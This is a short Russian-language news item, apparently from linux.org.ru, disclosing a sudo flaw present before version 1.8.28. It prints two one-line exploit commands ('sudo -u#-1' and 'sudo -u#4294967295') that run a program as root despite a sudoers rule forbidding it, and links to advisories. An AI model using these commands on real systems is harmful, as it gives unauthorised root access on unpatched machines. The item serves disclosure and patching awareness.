Ошибка в sudo позволяет выполнить от пользователя root любой исполняемый файл, если в /etc/sudoers разрешено его выполнение от других пользователей и запрещено для root.
Эксплуатация ошибки очень простая:
sudo -u#-1 id -u <command>
или:
sudo -u#4294967295 id -u <command>
Ошибка присутствует во всех версиях sudo до 1.8.28
Подробности:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Источник: linux.org.ru